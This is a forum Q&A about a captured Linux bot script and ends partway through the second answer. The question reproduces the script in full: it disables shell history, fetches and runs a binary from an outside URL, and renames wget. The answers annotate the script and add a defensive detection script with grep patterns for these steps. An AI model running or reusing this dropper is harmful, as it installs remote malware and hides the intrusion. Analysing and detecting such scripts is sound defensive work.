Can someone explain to me what this bot is trying to do?

Time: 2016-05-01 14:25:20

Tags: linux shell

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
unset HISTFILE HISTLOG HISTORY 
HISTFILE=/dev/null 
HISTSIZE=0 
cd /bin/ 
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc 
chmod +x acxxxhruvc /bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod +x acxxxhruvc /bin/acxxxhruvc
sleep 2 
mv /usr/bin/wget /usr/bin/good 
mv /bin/wget /bin/good 
ls -la /etc/daemon.cfg 
exit 0

2 answers:

Answer 0 (score: 2)

My comments are inline below:

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0

cd /bin/

#download an executable
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod +x acxxxhruvc

#run the downloaded executable
/bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
#it seems like it downloads an executable to overwrite the existing one
chmod +x acxxxhruvc
/bin/acxxxhruvc

sleep 2

#remove the wget application and overwrite the good application with it
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good

#list the details of this daemon.cfg file
ls -la /etc/daemon.cfg

exit 0

Basically the "good" application gets overwritten with wget; I guess the behaviour is the same.

Overall, it does nothing you would want. Probably malware.
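Two defender-side checks built from the behaviours the answer above points out, as an added example that is not part of the original post or answer. `scan_script` does static triage of a captured shell script (counts lines that disable history, download with wget or curl, `chmod +x` a file, or rename wget away), and `check_host` looks for the traces such a script leaves on a host or on a mounted image. The file names are the ones from the question; the URL inside the embedded sample is a constructed placeholder and nothing is downloaded.

```shell
#!/bin/sh
# Added example, not from the original post. Defender-side triage of the
# script in the question: a static scan of the script text and a check for
# the artifacts it leaves behind. Only file names from the question are used;
# the URL in the sample below is a constructed placeholder.

count() {  # count FILE REGEX -> number of matching lines (prints 0, never fails)
    grep -Ec "$2" "$1" 2>/dev/null || true
}

scan_script() {  # scan_script FILE -> total of suspicious lines (details on stderr)
    f="$1"
    hist=$(count "$f" '^(unset +HIST|HISTFILE=/dev/null|HISTSIZE=0)')
    dl=$(count "$f" '^(wget|curl) ')
    chmod_x=$(count "$f" '^chmod +\+x ')
    rename=$(count "$f" '^mv +/(usr/)?bin/wget ')
    [ "$hist" -gt 0 ]    && echo "  shell history disabled : $hist line(s)" >&2
    [ "$dl" -gt 0 ]      && echo "  remote download        : $dl line(s)" >&2
    [ "$chmod_x" -gt 0 ] && echo "  chmod +x on a file     : $chmod_x line(s)" >&2
    [ "$rename" -gt 0 ]  && echo "  wget renamed away      : $rename line(s)" >&2
    echo $((hist + dl + chmod_x + rename))
}

check_host() {  # check_host [ROOT] -> number of indicators found (details on stderr)
    root="${1:-}"   # empty ROOT means the live system; pass a mount point otherwise
    hits=0
    if [ -e "$root/bin/acxxxhruvc" ]; then
        echo "  dropped binary present: $root/bin/acxxxhruvc" >&2; hits=$((hits + 1))
    fi
    for d in "$root/bin" "$root/usr/bin"; do
        # after "mv .../wget .../good" a "good" sits where wget was and wget is gone
        if [ -e "$d/good" ] && [ ! -e "$d/wget" ]; then
            echo "  wget renamed: $d/good exists, $d/wget missing" >&2; hits=$((hits + 1))
        fi
    done
    if [ -e "$root/etc/daemon.cfg" ]; then
        echo "  file the script inspects exists: $root/etc/daemon.cfg" >&2; hits=$((hits + 1))
    fi
    echo "$hits"
}

write_sample() {  # write_sample FILE : the script from the question, URL replaced
    cat > "$1" <<'EOF'
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0
cd /bin/
wget http://malware.example/download/m/5414 -O acxxxhruvc
chmod +x acxxxhruvc /bin/acxxxhruvc
good http://malware.example/download/m/5414 -O acxxxhruvc
chmod +x acxxxhruvc /bin/acxxxhruvc
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
ls -la /etc/daemon.cfg
exit 0
EOF
}

# Demo: triage the sample script, then check the current system for its traces.
demo_dir=$(mktemp -d)
write_sample "$demo_dir/captured.sh"
echo "static triage of $demo_dir/captured.sh:"
echo "  total suspicious lines: $(scan_script "$demo_dir/captured.sh")"
echo "host check of this system:"
echo "  indicators found: $(check_host)"
rm -rf "$demo_dir"
```

`check_host` with no argument inspects the live machine; pointing it at a mounted disk image (`check_host /mnt/image`) is the safer way to examine a host that may still be running the dropped binary. A rename of `wget` to `good` is easy to miss on a quick look, so the check treats "good present, wget absent" in either `/bin` or `/usr/bin` as a hit.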

Answer 1 (score: 0)

If you are really curious, just download the suspicious file (acxxxhruvc) and investigate it (for example with strings acxxxhruvc), or submit it to some scanning service (for example VirusTotal).

In this case it looks like some variant of …